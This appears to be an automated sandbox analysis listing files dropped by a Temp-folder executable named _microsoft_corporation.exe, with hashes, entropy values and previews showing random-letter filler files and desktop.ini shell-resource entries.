                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.702896917219035
                                                          Encrypted:false
                                                          SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                          MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                          SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                          SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                          SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                          Malicious:false
                                                          Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.694982189683734
                                                          Encrypted:false
                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                          Malicious:false
                                                          Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.687722658485212
                                                          Encrypted:false
                                                          SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                          MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                          SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                          SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                          SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                          Malicious:false
                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.688284131239007
                                                          Encrypted:false
                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                          Malicious:false
                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.6994061563025005
                                                          Encrypted:false
                                                          SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                          MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                          SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                          SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                          SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                          Malicious:false
                                                          Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):504
                                                          Entropy (8bit):3.5258560106596737
                                                          Encrypted:false
                                                          SSDEEP:12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
                                                          MD5:06E8F7E6DDD666DBD323F7D9210F91AE
                                                          SHA1:883AE527EE83ED9346CD82C33DFC0EB97298DC14
                                                          SHA-256:8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
                                                          SHA-512:F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
                                                          Malicious:false
                                                          Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):190
                                                          Entropy (8bit):3.5497401529130053
                                                          Encrypted:false
                                                          SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                          MD5:D48FCE44E0F298E5DB52FD5894502727
                                                          SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                          SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                          SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                          Malicious:false
                                                          Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):190
                                                          Entropy (8bit):3.5497401529130053
                                                          Encrypted:false
                                                          SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                          MD5:87A524A2F34307C674DBA10708585A5E
                                                          SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                          SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                          SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                          Malicious:false
                                                          Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):504
                                                          Entropy (8bit):3.514398793376306
                                                          Encrypted:false
                                                          SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                          MD5:29EAE335B77F438E05594D86A6CA22FF
                                                          SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                          SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                          SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                          Malicious:false
                                                          Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):504
                                                          Entropy (8bit):3.5218877566914193
                                                          Encrypted:false
                                                          SSDEEP:12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
                                                          MD5:50A956778107A4272AAE83C86ECE77CB
                                                          SHA1:10BCE7EA45077C0BAAB055E0602EEF787DBA735E
                                                          SHA-256:B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
                                                          SHA-512:D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
                                                          Malicious:false
                                                          Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.696250160603532
                                                          Encrypted:false
                                                          SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                          MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                          SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                          SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                          SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                          Malicious:false
                                                          Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):4.688284131239007
                                                          Encrypted:false
                                                          SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                          MD5:E8ACCA0F46CBA97FE289855535184C72
                                                          SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                          SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                          SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                          Malicious:false
                                                          Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
